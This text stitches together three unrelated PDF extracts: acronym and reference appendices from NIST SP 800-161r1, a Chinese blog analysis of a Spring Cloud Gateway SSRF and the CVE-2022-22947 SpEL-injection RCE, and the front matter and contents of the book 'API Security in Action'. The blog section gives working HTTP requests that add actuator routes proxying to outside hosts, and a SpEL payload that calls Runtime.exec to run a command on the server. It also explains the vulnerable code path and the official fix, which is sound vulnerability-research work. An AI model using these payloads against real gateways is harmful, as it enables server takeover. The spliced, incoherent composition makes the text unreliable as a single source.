This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
APPENDIX I: ACRONYMS
A&A
Assessment and Authorization
AO
Authorizing Official
API
Application Programming Interface
APT
Advanced Persistent Threat
BIA
Business Impact Analysis
BYOD
Bring Your Own Device
CAC
Common Access Card
CAO
Chief Acquisition Officer
CEO
Chief Executive Officer
CFO
Chief Financial Officer
CIO
Chief Information Officer
CISA
Cybersecurity and Infrastructure Security Agency
CISO
Chief Information Security Officer
CISS
Cyber Incident Severity Schema
CLO
Chief Legal Officer
COO
Chief Operating Officer
CPO
Chief Privacy Officer
CRO
Chief Risk Officer
CSO
Chief Security Officer
CTO
Chief Technology Officer
CNSS
Committee on National Security Systems
CNSSI
Committee on National Security Systems Instruction
CONUS
Continental United States
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
308
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
COSO
Committee of Sponsoring Organizations of the Treadway Commission
COTS
Commercial Off-The-Shelf
CRO
Chief Risk Officer
C-SCRM
Cybersecurity Supply Chain Risk Management
CSF
Cybersecurity Framework
CTO
Chief Technology Officer
CUI
Controlled Unclassified Information
CVE
Common Vulnerability Enumeration
CVSS
Common Vulnerability Scoring System
CWE
Common Weakness Enumeration
DHS
Department of Homeland Security
DMEA
Defense Microelectronics Activity
DoD
Department of Defense
DODI
Department of Defense Instruction
ERM
Enterprise Risk Management
ERP
Enterprise Resource Planning
FAR
Federal Acquisition Regulation
FARM
Frame, Assess, Respond, Monitor
FASC
Federal Acquisition Security Council
FASCA
Federal Acquisition Supply Chain Security Act
FBI
Federal Bureau of Investigation
FedRAMP
Federal Risk and Authorization Program
FIPS
Federal Information Processing Standards
FISMA
Federal Information Security Management Act
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
309
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FITARA
Federal Information Technology Acquisition Reform Act
FOCI
Foreign Ownership, Control or Influence
FSP
Financial Services Cybersecurity Framework Profile
GAO
Government Accountability Office
GIDEP
Government-Industry Data Exchange Program
GOTS
Government Off-The-Shelf
GPS
Global Positioning System
HR
Human Resources
IA
Information Assurance
ICT
Information and Communication Technology
ICT/OT
Information, communications, and operational technology
IDE
Integrated Development Environment
IDS
Intrusion Detection System
IEC
International Electrotechnical Commission
IOT
Internet of Things
IP
Internet Protocol/Intellectual Property
ISA
Information Sharing Agency
ISO/IEC
International Organization for Standardization/International
Electrotechnical Commission
IT
Information Technology
ITIL
Information Technology Infrastructure Library
ITL
Information Technology Laboratory (NIST)
JWICS
Joint Worldwide Intelligence Communications System
KPI
Key Performance Indicators
KRI
Key Risk Indicators
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
310
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
KSA
Knowledge, Skills, and Abilities
MECE
Mutually Exclusive and Collectively Exhaustive
NISPOM
National Industrial Security Program Operating Manual
NIST
National Institute of Standards and Technology
NCCIC
National Cybersecurity and Communications Integration Center
NDI
Non-developmental Items
NDIA
National Defense Industrial Association
NIAP
National Information Assurance Partnership
NICE
National Initiative for Cybersecurity Education
NISTIR
National Institute of Standards and Technology Interagency or Internal
Report
OCONUS
Outside of Continental United States
OEM
Original Equipment Manufacturer
OGC
Office of the General Counsel
OMB
Office of Management and Budget
OPSEC
Operations Security
OSS
Open Source Solutions
OSY
Office of Security
OT
Operations Technology
OTS
Off-The-Shelf
OTTF
Open Group Trusted Technology Forum
O-TTPS
Open Trusted Technology Provider™ Standard
OWASP
Open Web Application Security Project
PACS
Physical Access Control System
PII
Personally Identifiable Information
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
311
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
PIV
Personal Identity Verification
PM
Program Manager
PMO
Program Management Office
POA&M
Plan of Action & Milestones
QA/QC
Quality Assurance/Quality Control
R&D
Research and Development
RFI
Request for Information
RFP
Request for Proposal
RFQ
Request for Questions
RMF
Risk Management Framework
SAFECode Software Assurance Forum for Excellence in Code
SBOM
Software Bill of Materials
SCIF
Sensitive Compartmented Information Facility
SCRI
Supply Chain Risk Information
SCRM
Supply Chain Risk Management
SCRSS
Supply Chain Risk Severity Schema
SDLC
System Development Life Cycle
SECURE
Strengthening and Enhancing Cyber-capabilities by Utilizing Risk
Exposure (Technology Act)
SLA
Service-Level Agreement
SME
Subject Matter Expert
SOO
Statement of Objective
SOW
Statement of Work
SP
Special Publication (NIST)
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
312
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
SSP
System Security Plan
SWA
Software Assurance
SWID
Software Identification Tag
TTP
Tactics, Techniques, and Procedures
U.S.
United States (of America)
US CERT
United States Computer Emergency Readiness Team
VDR
Vulnerability Disclosure Report
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
313
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
APPENDIX J: RESOURCES
RELATIONSHIP TO OTHER PROGRAMS AND PUBLICATIONS
This revision to NIST SP 800-161 builds upon concepts described in a number of NIST and
other publications to facilitate integration with the agencies’ existing enterprise-wide activities,
as well as a series of legislative developments following its initial release. These resources are
complementary and help enterprises build risk-based information security programs to protect
their operations and assets against a range of diverse and increasingly sophisticated threats. This
publication will be revised to remain consistent with the NIST SP 800-53 security controls
catalog using an iterative process as the C-SCRM discipline continues to mature.
NIST Publications
This document leverages the latest versions of the publications and programs that guided its
initial development, as well as new publications following its initial release:
• NIST Cybersecurity Framework (CSF) Version 1.1
• FIPS 199, Standards for Security Categorization of Federal Information and Information
Systems, to conduct criticality analysis and scoping C-SCRM activities to high-impact
components or systems [FIPS 199]
• NIST SP 800-30, Rev. 1, Guide for Conducting Risk Assessments, to integrate ICT/OT
SCRM into the risk assessment process [NIST SP 800-30, Rev. 1]
• NIST SP 800-37, Rev. 2, Risk Management Framework for Information Systems and
Organizations: A System Life Cycle Approach for Security and Privacy [NIST SP 800-
37, Rev. 2]
• NIST SP 800-39, Managing Information Security Risk: Organization, Mission, and
Information System View, to integrate ICT/OT SCRM into the risk management levels
and risk management process [NIST SP 800-39]
• NIST SP 800-53, Rev. 5, Security and Privacy Controls for Information Systems and
Organizations, to provide information security controls for enhancing and tailoring to the
C-SCRM context [NIST SP 800-53, Rev. 5]
• NIST SP 800-53B, Control Baselines for Information Systems and Organizations, to
codify control baselines and C-SCRM supplementary guidance and [NIST SP 800-53B]
• NIST SP 800-150, Guide to Cyber Threat Information Sharing, to provide guidelines for
establishing and participating in cyber threat information relationships [NIST SP 800-
150]
• NIST SP 800-160 Vol. 1, Systems Security Engineering [NIST SP 800-160 Vol. 1] and
NIST SP 800-160 Vol. 2, Rev. 1, Developing Cyber Resilient Systems: A Systems
Security Engineering Approach [NIST SP 800-160 Vol. 2] for specific guidance on the
security engineering aspects of C-SCRM
• NIST SP 800-171, Rev. 2, Protecting Controlled Information in Nonfederal Systems and
Organizations, for recommended security requirements to protect the confidentiality of
CUI [NIST SP 800-171, Rev. 2]
• NIST SP 800-172, Enhanced Security Requirements for Protecting Controlled
Unclassified Information – A Supplement to NIST Special Publication 800-171, for
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
314
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
recommended enhanced security requirements for protecting the confidentiality of CUI
[NIST SP 800-172]
• NIST SP 800-181, Rev. 1, National Initiative for Cybersecurity Education (NICE)
Cybersecurity Workforce Framework, as a means of forming a common lexicon for C-
SCRM workforce topics [NIST SP-800-181, Rev. 1]
• NISTIR 7622, Notional Supply Chain Risk Management Practices for Federal
Information Systems, for background materials in support of applying the special
publication to their specific acquisition processes [NISTIR 7622]
• NISTIR 8179, Criticality Analysis Process Model: Prioritizing Systems and Components,
to guide ratings of supplier criticality [NISTIR 8179]
• NISTIR 8276, Key Practices in Cyber Supply Chain Risk Management: Observations
from Industry, to elucidate recent C-SCRM trends in the private sector [NISTIR 8276]
• NISTIR 8286, Identifying and Estimating Cybersecurity Risk for Enterprise Risk
Management (ERM), to inform the content on integrating C-SCRM into enterprise risk
management [NISTIR 8286]
Regulatory and Legislative Guidance
This document is heavily informed by regulatory and legislative guidance, including:
• Office of Management and Budget (OMB) Circular A-123, Management’s Responsibility
for Internal Control
• Office of Management and Budget (OMB) Circular A-130, Managing Information as a
Strategic Resource
• The Federal Acquisition Supply Chain Security Act (FASCA), Title II of the
Strengthening and Enhancing Cyber-capabilities by Utilizing Risk Exposure Technology
Act (SECURE) Technology Act of 2018
• Public Law 115–232 § 889, Prohibition on Contracting Certain Telecommunications and
Video Surveillance Services or Equipment
• Federal Register, Vol. 84, No. 156, Prohibition on Contracting for Certain
Telecommunications and Video Surveillance Services or Equipment, August 13, 2019
• FAR Part 4, Subpart 4.20, Prohibition on Contracting for Hardware, Software, and
Services Developed or Provided by Kaspersky Lab
• (GAO), Challenges and Policy Considerations Regarding Offshoring and Foreign
Investment Risks, September 2019
• Executive Order 14028, Improving the Nation’s Cybersecurity, May 12, 2021
• Securities and Exchange Commission 17 CFR Parts 229 and 249 [Release Nos. 33-
10459; 34-82746] Commission Statement and Guidance on Public Company
Cybersecurity Disclosures
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
315
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Other U.S. Government Reports
This document is also informed by additional government reports:
• Government Accountability Office (GAO) Report, Information Technology: Federal
Agencies Need to Take Urgent Action to Manage Supply Chain Risks, December 2020,
GAO-21-171 [GAO]
• Department of Defense and Department of Homeland Security Software Assurance
Acquisition Working Group, Software Assurance in Acquisition: Mitigating Risks to the
Enterprise [SwA]
• National Defense Industrial Association (NDIA), Engineering for System Assurance
[NDIA]
Standards, Guidelines, and Best Practices
Additionally, [NIST SP 800-161] draws inspiration from a number of international standards,
guidelines, and best practice documents, including:
• The Federal Risk and Authorization Management Program (FedRAMP), Securing Cloud
Services For The Federal Government [https://www.fedramp.gov/]
• International Organization for Standardization/International Electrotechnical Commission
(ISO/IEC) 15288 – Systems and software engineering – System Life Cycle Processes
[ISO/IEC 15288]
• ISO/IEC 27036 – Information Technology – Security Techniques – Information Security
for Supplier Relationships [ISO/IEC 27036]
• ISO/IEC 20243 – Information Technology – Open Trusted Technology ProviderTM
Standard (O-TTPS) – Mitigating maliciously tainted and counterfeit products [ISO/IEC
20243]
• ISO/IEC 27000 – Information Technology – Security Techniques – Information Security
Management System – Overview and Vocabulary [ISO/IEC 27000]
• ISO/IEC 27002 – Information Technology – Security Techniques – Code of Practice for
Information Security Controls [ISO/IEC 27002]
• Software Assurance Forum for Excellence in Code (SAFECode) Software Integrity
Framework [SAFECode 2] and Software Integrity Best Practices [SAFECode 1]
• Cyber Risk Institute, Financial Services Cybersecurity Framework Profile Version 1.1
[FSP] | pdf |
从SSRF 到 RCE —— 对 Spring Cloud Gateway
RCE漏洞的分析
0x01 写在前⾯
本周⼆(3.1)的时候Spring官⽅发布了 Spring Cloud Gateway CVE 报告
其中编号为 CVE-2022-22947 Spring Cloud Gateway 代码注⼊漏洞的严重性为危急,周三周四的时候就有不少圈
内的朋友发了分析和复现过程,由于在⼯作和写论⽂,就⼀直没去跟踪看看,周末抽了点时间对这个漏洞进⾏复现
分析了⼀下。还是挺有意思的。
0x02 从SSRF说起
看到这个漏洞利⽤流程的时候,就有⼀种熟悉的既视感,回去翻了翻陈师傅的星球,果然:
去年12⽉的时候,陈师傅提了⼀个 actuator gateway 的 SSRF漏洞,这个漏洞来⾃ wya
作者在⽂章中提到,通过Spring Cloud Gateway 执⾏器(actuator)提供的管理功能就可以对路由进⾏添加、删
除等操作。
因此作者利⽤ actuator 提供的路由添加功能,并根据官⽅示例,如下图:
添加了⼀个路由:
POST /actuator/gateway/routes/new_route HTTP/1.1
Host: 127.0.0.1:9000
Connection: close
Content-Type: application/json
{
"predicates": [
{
"name": "Path",
"args": {
"_genkey_0": "/new_route/**"
在执⾏ refresh 操作后,作者成功执⾏了⼀个SSRF请求(向https://wya.pl/index.php发起的请求):
陈师傅最后还在星球⾥给了个演示的实例:https://github.com/API-Security/APISandbox/blob/main/OASystem/
README.md
先不具体讨论为什么payload会这样写,如果你熟悉 CVE-2022-22947 的payload,那么看到这⾥你⼀定会有同样
的熟悉感。
是的,CVE-2022-22947 这个漏洞实际上就是这个 SSRF 的进阶版,并且触发SSRF的原理并不复杂
⾸先利⽤ /actuator/gateway/routes/{new route} 的⽅式指定⼀个URL地址,并针对该地址添加⼀个路由
}
}
],
"filters": [
{
"name": "RewritePath",
"args": {
"_genkey_0": "/new_route(?<path>.*)",
"_genkey_1": "/${path}"
}
}
],
"uri": "https://wya.pl",
"order": 0
}
POST /actuator/gateway/routes/new_route HTTP/1.1
Host: 127.0.0.1:8080
Connection: close
Content-Type: application/json
{
"predicates": [
{
"name": "Path",
"args": {
"_genkey_0": "/new_route/**"
}
}
],
"filters": [
{
"name": "RewritePath",
"args": {
"_genkey_0": "/new_route(?<path>.*)",
"_genkey_1": "/${path}"
然后刷新令这个路由⽣效:
最后直接访问 /new_route/index.php 即可触发SSRF漏洞。
到这⾥有两个问题:第⼀,payload为什么会这样写?第⼆,整个请求流程是什么样的?
⾸先来看第⼀个问题,payload为什么会这样写
上⽂中我们提到了Spring Cloud Gateway官⽅给的实例如下:
这实例对⽐⼀下SSRF的payload,我们可以发现,在SSRF的payload中多了对过滤器(filters)的具体定义。
⽽纵观整个payload,实际上可以发现,其就是⼀个动态路由的配置过程。
}
}
],
"uri": "https://www.cnpanda.net",
"order": 0
}
POST /actuator/gateway/routes/new_route HTTP/1.1
Host: 127.0.0.1:8080
Connection: close
Content-Type: application/json
{
"predicate": "Paths: [/new_route], match trailing slash: true",
"route_id": "new_route",
"filters": [
"[[RewritePath /new_route(?<path>.*) = /${path}], order = 1]"
],
"uri": "https://www.cnpanda.net",
"order": 0
}
{
"id": "first_route",
"predicates": [{
"name": "Path",
"args": {"_genkey_0":"/first"}
}],
"filters": [],
"uri": "https://www.uri-destination.org",
"order": 0
}
在Spring Cloud Gateway中,路由的配置分为静态配置和动态配置,对于静态配置⽽⾔,⼀旦要添加、修改或者删
除内存中的路由配置和规则,就必须重启才可以。但在现实⽣产环境中,使⽤ Spring Cloud Gateway 都是作为所
有流量的⼊⼝,为了保证系统的⾼可⽤性,需要尽量避免系统的重启,因⽽⼀般情况下,Spring Cloud Gateway使
⽤的都是动态路由。
Spring Cloud Gateway 配置动态路由的⽅式有两种,第⼀种就是⽐较常⻅的,通过重写代码,实现⼀套动态路由
⽅法,如这⾥就有⼀个动态路由的配置过程。第⼆种就是上⽂中SSRF这种⽅式,但是这种⽅式是基于jvm内存实
现,⼀旦服务重启,新增的路由配置信息就是完全消失了。这也是P师傅在v2ex上回答的原理
所以其实payload就是⽐较固定的格式,⾸先定义⼀个谓词(predicates),⽤来匹配来⾃⽤户的请求,然后再增
加⼀个内置或⾃定义的过滤器(filters),⽤于执⾏额外的功能逻辑。
payload中我们⽤的是重写路径过滤器(RewritePath),类似的还有设置路径过滤器(SetPath)、去掉URL前缀
过滤器(StripPrefix)等,具体可以参考gateway内置的filter这张图:
以及gateway内置的Global Filter图:
第⼀个问题搞懂了就可以看看第⼆个问题了:整个请求流程是什么样的?
还是如上例所演示的,当在浏览器中向 127.0.0.1:8080 地址发起根路径为 /new_route 的请求时,会被 Spring
Cloud Gateway 转发请求到 https://www.cnpanda.net/ 的根路径下
⽐如,我们向 127.0.0.1:8080 地址发起为 /new_route/index.php 的请求,那么实际上会被 Spring Cloud
Gateway 转发请求到 https://www.cnpanda.net/index.php 的路径下,官⽅在其官⽅⽂档(Spring Cloud
GateWay⼯作流程)简单说明了流程:
看起来⽐较简单,实际上要复杂的多,我做了⼀个更详细⼀点图帮助⼤家理解:
我们⾸先向浏览器发送 http://127.0.0.1:8080/new_route/index.php 的请求,浏览器接收该请求后交给
Spring Cloud Gateway,由Spring Cloud Gateway 进⾏内部处理,⾸先是在 Gateway Handler Mapping 模块中
找到与 /new_route/index.php 请求相匹配的路由,然后将其发送到Gateway Web Handler模块,在这个模块中
⾸先进⼊globalFilters中,由 globalFilters(NettyWriteResponseFilter、ForwardPathFilter、
RouteToRequestUrlFilter、LoadBalancerClientFilter、AdaptCachedBodyGlobalFilter、
WebsocketRoutingFilter、NettyRoutingFilter、ForwardRoutingFilter) 作为构造器参数创建
FilteringWebHandler。
如下图,可以在 NettyRoutingFilter 中看到我们请求的中间态:
然后,再由 FilteringWebHandler 运⾏特定的请求过滤器链,所有 Pre 过滤器(前过滤器)逻辑先执⾏,然后再向
Proxied Service 执⾏代理请求,代理请求完成后,再由 Proxied Service 返回到 Gateway Web Handler模块去执
⾏ post 过滤器(后过滤器)逻辑,最后由NettyWriteResponseFilter 返回响应内容到我们。响应过程可以参考⽹关
Spring-Cloud-Gateway 源码解析 —— 过滤器 (4.7) 之 NettyRoutingFilter:
最终⼀次完整SSRF响应请求就形成了。
实际上这种的 SSRF 属于Spring Cloud Gateway 本身的功能带来的”副产品“,类似于PHPMyadmin后台的SQL注⼊
漏洞。
0x03 CVE-2022-22947 分析
如果你认真的看完了上⼀节的内容,那么你现在可能会对这个漏洞有了更多的认识。
漏洞的触发点在于我们熟知的SpEL表达式
实际上现在不具体分析源码,根据已有payload或者官⽅修复diff,你也应该能够得到⼀个结论:在动态添加路由的
过程中,某个filter可以对传⼊进来的值进⾏SpEL表达式解析,从⽽造成了远程代码执⾏漏洞
那么到底是不是如此呢?
根据这种思路,通过source和sink,然后向上向下连线的⽅式来验证
先来看看source,即创建路由时的payload:
可以看到这⾥使⽤的filter是AddResponseHeader,由于我们已经猜测是SPEL表达,因此我们直接搜索SpEL的触
发点StandardEvaluationContext:
可以发现,在 ShortcutConfigurable 接⼝的getValue⽅法中,使⽤了StandardEvaluationContext,并且对
传⼊的 SpEL 表达式进⾏了解析
那么接着查找 ShortcutConfigurable 接⼝的实现类有哪些:
{
"id": "hacktest",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new
String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).get
Runtime().exec(new String[]{\"id\"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
可以看到有很多,但是我们要找的是与AddResponseHeader过滤器相关的类,AddResponseHeader过滤器的⼯
⼚类是org.springframework.cloud.gateway.filter.factory#AddResponseHeaderGatewayFilterFactory,因
此根据模块名我们可以直接确定位置:
逐⼀查看会发现:
AddResponseHeaderGatewayFilterFactory 继承于 AbstractNameValueGatewayFilterFactory
AbstractNameValueGatewayFilterFactory 继承于 AbstractGatewayFilterFactory
AbstractGatewayFilterFactory 实现了 GatewayFilterFactory 接⼝
GatewayFilterFactory 接⼝继承于 ShortcutConfigurable
因此当从 AddResponseHeaderGatewayFilterFactory 传⼊的值进⾏计算(getValue())的时候,会逐⼀向上调
⽤对应的⽅法,直到进⼊带有 SpEL 表达式解析器的位置进⾏最后的解析,也从⽽触发了SpEL表达式注⼊漏洞。
最后我们也可以直接进⼊ AddResponseHeaderGatewayFilterFactory 类回顾看看:
可以看到,⾸先在apply⽅法中传⼊了NameValueConfig类型的config,点进去可以看到NameValueConfig类型
有两个值,并且不能为空:
public class AddResponseHeaderGatewayFilterFactory extends
AbstractNameValueGatewayFilterFactory {
@Override
public GatewayFilter apply(NameValueConfig config) {
return new GatewayFilter() {
@Override
public Mono<Void> filter(ServerWebExchange exchange, GatewayFilterChain chain) {
String value = ServerWebExchangeUtils.expand(exchange, config.getValue());
exchange.getResponse().getHeaders().add(config.getName(), value);
return chain.filter(exchange);
}
@Override
public String toString() {
return filterToStringCreator(AddResponseHeaderGatewayFilterFactory.this)
.append(config.getName(), config.getValue()).toString();
}
};
}
}
可以看到,NameValueConfig 在AbstractNameValueGatewayFilterFactory中,
AbstractNameValueGatewayFilterFactory是AddResponseHeaderGatewayFilterFactory的⽗类,在⽗类中进⾏
了getValue()操作,并且可以看到 config 中通过 getValue() 返回的 value 值就是我们所执⾏的SpEL表达式返回的
结果:
0x04 漏洞修复
由于是SpEL表达式注⼊漏洞,⽽引起这个漏洞的原因⼀般是使⽤了 StandardEvaluationContext ⽅法去解析表
达式,解析表达式的⽅法有两个:
SimpleEvaluationContext - 针对不需要SpEL语⾔语法的全部范围并且应该受到有意限制的表达式类别,公开
SpEL语⾔特性和配置选项的⼦集。
StandardEvaluationContext - 公开全套SpEL语⾔功能和配置选项。您可以使⽤它来指定默认的根对象并配置
每个可⽤的评估相关策略。
SimpleEvaluationContext旨在仅⽀持SpEL语⾔语法的⼀个⼦集,不包括 Java类型引⽤、构造函数和bean引⽤。
⽽StandardEvaluationContext ⽀持全部SpEL语法。所以根据功能描述,将StandardEvaluationContext⽅法⽤
SimpleEvaluationContext ⽅法替换即可。
官⽅的修复⽅法是利⽤ BeanFactoryResolver 的⽅式去引⽤Bean,然后将其传⼊官⽅⾃⼰写的⼀个解析的⽅法
GatewayEvaluationContext中:
此外,官⽅还给了建议:
如果不需要Gateway actuator的endpoint功能,就关了它吧,如果需要,那么就利⽤ Spring Security 对其进⾏保
护,具体的保护⽅式可以参考:https://docs.spring.io/spring-boot/docs/current/reference/html/actuator.html
#actuator.endpoints.security
0x05 写在最后
这个漏洞的原理还是⽐较清晰的,可惜没能通过陈师傅在星球发的那个SSRF漏洞更深的去分析,尝试挖掘新的漏
洞,果然,成功是留给有⼼⼈的呀!
在这⾥提醒⼀下,在实际环境中,如果由于某种原因删除不起作⽤,有可能会导致刷新请求失败,那么就会有可能
会导致站点出现问题,所以在实际测试的过程中,建议别乱搞,不然就要重启站点了。
最后,这个漏洞像不像是官⽅提供的⼀种内存⻢?(hhhhhhhh
⽂笔有限,如果⽂章有错误,欢迎师傅们指正
0x06 参考
https://juejin.cn/post/6844903639840980999
https://blog.csdn.net/qq_38233650/article/details/98038225
https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/README.zh-cn.md
https://github.com/spring-cloud/spring-cloud-gateway/commit/337cef276bfd8c59fb421bfe7377a9e19c68fe
1e | pdf |
M A N N I N G
Neil Madden
API security
Authorization
Audit logging
Authentication
Encryption
Rate-limiting
Passwords
Token-based
Cookies
Macaroons
JWTs
Certificates
End-to-end
Identity-based
ACLs
Roles
ABAC
Capabilities
OAuth2
Security mechanisms
Mechanism
Chapter
Audit logging
3
Rate-limiting
3
Passwords
3
Cookies
4
Token-based auth
5
Macaroons
JSON web tokens (JWTs)
6
Mechanism
Chapter
Access control lists (ACL)
3
Roles
Attribute-based access
control (ABAC)
8
Capabilities
Oauth2
Encryption
6
End-to-end authentication
13
11
Certificates
7
8
9
9
API Security
in Action
NEIL MADDEN
M A N N I N G
SHELTER ISLAND
For online information and ordering of this and other Manning books, please visit
www.manning.com. The publisher offers discounts on this book when ordered in quantity.
For more information, please contact
Special Sales Department
Manning Publications Co.
20 Baldwin Road
PO Box 761
Shelter Island, NY 11964
Email: [email protected]
©2020 by Manning Publications Co. All rights reserved.
No part of this publication may be reproduced, stored in a retrieval system, or transmitted, in
any form or by means electronic, mechanical, photocopying, or otherwise, without prior written
permission of the publisher.
Many of the designations used by manufacturers and sellers to distinguish their products are
claimed as trademarks. Where those designations appear in the book, and Manning Publications
was aware of a trademark claim, the designations have been printed in initial caps or all caps.
Recognizing the importance of preserving what has been written, it is Manning’s policy to have
the books we publish printed on acid-free paper, and we exert our best efforts to that end.
Recognizing also our responsibility to conserve the resources of our planet, Manning books
are printed on paper that is at least 15 percent recycled and processed without the use of
elemental chlorine.
Development editor: Toni Arritola
Technical development editor: Joshua White
Manning Publications Co.
Review editor: Ivan Martinovic´
20 Baldwin Road
Production editor: Deirdre S. Hiam
PO Box 761
Copy editor: Katie Petito
Shelter Island, NY 11964
Proofreader: Keri Hales
Technical proofreader: Ubaldo Pescatore
Typesetter: Dennis Dalinnik
Cover designer: Marija Tudor
ISBN: 9781617296024
Printed in the United States of America
In memory of Susan Elizabeth Madden, 1950–2018.
v
contents
preface
xi
acknowledgments
xiii
about this book
xv
about the author
xix
about the cover illustration
xx
PART 1
FOUNDATIONS ....................................................1
1
What is API security?
3
1.1
An analogy: Taking your driving test
4
1.2
What is an API?
6
API styles
7
1.3
API security in context
8
A typical API deployment
10
1.4
Elements of API security
12
Assets
13
■ Security goals
14
■ Environments and
threat models
16
1.5
Security mechanisms
19
Encryption
20
■ Identification and authentication
21
Access control and authorization
22
■ Audit logging
23
Rate-limiting
24
CONTENTS
vi
2
Secure API development
27
2.1
The Natter API
27
Overview of the Natter API
28
■ Implementation overview
29
Setting up the project
30
■ Initializing the database
32
2.2
Developing the REST API
34
Creating a new space
34
2.3
Wiring up the REST endpoints
36
Trying it out
38
2.4
Injection attacks
39
Preventing injection attacks
43
■ Mitigating SQL injection
with permissions
45
2.5
Input validation
47
2.6
Producing safe output
53
Exploiting XSS Attacks
54
■ Preventing XSS
57
Implementing the protections
58
3
Securing the Natter API
62
3.1
Addressing threats with security controls
63
3.2
Rate-limiting for availability
64
Rate-limiting with Guava
66
3.3
Authentication to prevent spoofing
70
HTTP Basic authentication
71
■ Secure password storage with
Scrypt
72
■ Creating the password database
72
■ Registering
users in the Natter API
74
■ Authenticating users
75
3.4
Using encryption to keep data private
78
Enabling HTTPS
80
■ Strict transport security
82
3.5
Audit logging for accountability
82
3.6
Access control
87
Enforcing authentication
89
■ Access control lists
90
Enforcing access control in Natter
92
■ Adding new members to
a Natter space
94
■ Avoiding privilege escalation attacks
95
PART 2
TOKEN-BASED AUTHENTICATION........................99
4
Session cookie authentication
101
4.1
Authentication in web browsers
102
Calling the Natter API from JavaScript
102
■ Intercepting form
submission
104
■ Serving the HTML from the same origin
105
Drawbacks of HTTP authentication
108
CONTENTS
vii
4.2
Token-based authentication
109
A token store abstraction
111
■ Implementing token-based
login
112
4.3
Session cookies
115
Avoiding session fixation attacks
119
■ Cookie security
attributes
121
■ Validating session cookies
123
4.4
Preventing Cross-Site Request Forgery attacks
125
SameSite cookies
127
■ Hash-based double-submit cookies
129
Double-submit cookies for the Natter API
133
4.5
Building the Natter login UI
138
Calling the login API from JavaScript
140
4.6
Implementing logout
143
5
Modern token-based authentication
146
5.1
Allowing cross-domain requests with CORS
147
Preflight requests
148
■ CORS headers
150
■ Adding CORS
headers to the Natter API
151
5.2
Tokens without cookies
154
Storing token state in a database
155
■ The Bearer authentication
scheme
160
■ Deleting expired tokens
162
■ Storing tokens in
Web Storage
163
■ Updating the CORS filter
166
■ XSS
attacks on Web Storage
167
5.3
Hardening database token storage
170
Hashing database tokens
170
■ Authenticating tokens with
HMAC
172
■ Protecting sensitive attributes
177
6
Self-contained tokens and JWTs
181
6.1
Storing token state on the client
182
Protecting JSON tokens with HMAC
183
6.2
JSON Web Tokens
185
The standard JWT claims
187
■ The JOSE header
188
Generating standard JWTs
190
■ Validating a signed JWT
193
6.3
Encrypting sensitive attributes
195
Authenticated encryption
197
■ Authenticated encryption with
NaCl
198
■ Encrypted JWTs
200
■ Using a JWT library
203
6.4
Using types for secure API design
206
6.5
Handling token revocation
209
Implementing hybrid tokens
210
CONTENTS
viii
PART 3
AUTHORIZATION.............................................215
7
OAuth2 and OpenID Connect
217
7.1
Scoped tokens
218
Adding scoped tokens to Natter
220
■ The difference between scopes
and permissions
223
7.2
Introducing OAuth2
226
Types of clients
227
■ Authorization grants
228
■ Discovering
OAuth2 endpoints
229
7.3
The Authorization Code grant
230
Redirect URIs for different types of clients
235
■ Hardening code
exchange with PKCE
236
■ Refresh tokens
237
7.4
Validating an access token
239
Token introspection
239
■ Securing the HTTPS client
configuration
245
■ Token revocation
248
■ JWT access
tokens
249
■ Encrypted JWT access tokens
256
■ Letting the
AS decrypt the tokens
258
7.5
Single sign-on
258
7.6
OpenID Connect
260
ID tokens
260
■ Hardening OIDC
263
■ Passing an ID token
to an API
264
8
Identity-based access control
267
8.1
Users and groups
268
LDAP groups
271
8.2
Role-based access control
274
Mapping roles to permissions
276
■ Static roles
277
Determining user roles
279
■ Dynamic roles
280
8.3
Attribute-based access control
282
Combining decisions
284
■ Implementing ABAC decisions
285
Policy agents and API gateways
289
■ Distributed policy
enforcement and XACML
290
■ Best practices for ABAC
291
9
Capability-based security and macaroons
294
9.1
Capability-based security
295
9.2
Capabilities and REST
297
Capabilities as URIs
299
■ Using capability URIs in the Natter
API
303
■ HATEOAS
308
■ Capability URIs for browser-based
CONTENTS
ix
clients
311
■ Combining capabilities with identity
314
Hardening capability URIs
315
9.3
Macaroons: Tokens with caveats
319
Contextual caveats
321
■ A macaroon token store
322
First-party caveats
325
■ Third-party caveats
328
PART 4
MICROSERVICE APIS IN KUBERNETES...............333
10
Microservice APIs in Kubernetes
335
10.1
Microservice APIs on Kubernetes
336
10.2
Deploying Natter on Kubernetes
339
Building H2 database as a Docker container
341
■ Deploying
the database to Kubernetes
345
■ Building the Natter API as a
Docker container
349
■ The link-preview microservice
353
Deploying the new microservice
355
■ Calling the link-preview
microservice
357
■ Preventing SSRF attacks
361
DNS rebinding attacks
366
10.3
